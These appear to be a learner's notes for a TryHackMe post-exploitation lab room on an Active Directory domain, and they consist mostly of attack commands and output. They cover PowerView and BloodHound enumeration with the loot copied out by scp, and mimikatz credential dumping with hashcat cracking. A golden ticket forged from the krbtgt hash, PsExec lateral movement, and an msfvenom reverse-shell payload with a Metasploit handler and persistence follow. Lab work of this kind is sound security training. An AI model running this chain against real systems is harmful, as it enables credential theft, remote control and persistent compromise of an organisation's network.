https://tryhackme.com/room/postexploit
$ ssh [email protected]
> powershell -ep bypass # bypass execution policy so you can run scripts
PS> . .\\Downloads\\PowerView.ps1
PS> Get-NetUser | select cn
PS> Get-NetGroup -GroupName *admin*
PS> Invoke-ShareFinder
PS> Get-NetComputer -fulldata | select operatingsystem
PS> . .\\Downloads\\SharpHound.ps1
PS> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
PS> scp -o StrictHostKeyChecking=no 20200802172728_loot.zip [email protected]:~
kali@kali:~$ sudo neo4j console
# Browser: <http://localhost:7474> -> login with neo4j:neo4j(j)
kali@kali:~$ bloodhound
In Bloodhound
> cd Downloads && mimikatz.exe
# ensure running as admin
mimikatz # privilege::debug
Privilege '20' OK
# dump hashes
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
[...]
kali@kali:~$ hashcat -m1000 <hash> rockyou.txt
> cd Downloads && mimikatz.exe
# ensure running as admin
mimikatz # privilege::debug
# dump hash and identifier of KTGT
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
# generate golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
# open cmd with elevated privileges
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6CBE143B8
# can't in box, but for example
> dir \\\\Desktop-1\\c$ # view Desktop-1 C:\\
> PsExec.exe \\\\Desktop-1 cmd.exe # run cmd as Desktop-1
RDP (Remmina)
Simply look around 🙂
# create payload
kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.83.23 LPORT=5555 -f exe -o shell.exe
# delivering payload
kali@kali:~$ scp shell.exe [email protected]:.
# connecting to payload
kali@kali:~$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 10.8.83.23
msf5 exploit(multi/handler) > run [-z] # to background
[*] Started reverse TCP handler on 10.8.83.23:4444
# run shell.exe on target machine
[*] Command shell session 1 opened (10.8.83.23:4444 -> 10.10.242.217:50062) at 2020-08-02 22:21:15 -0400
background
# creating persistence
msf5 exploit(multi/handler) > use exploit/windows/local/persistence
msf5 exploit(windows/local/persistence) > set session 1
msf5 exploit(windows/local/persistence) > run
# if connection dies, redo msf5 exploit(multi/handler) > run
# some difficulties getting to work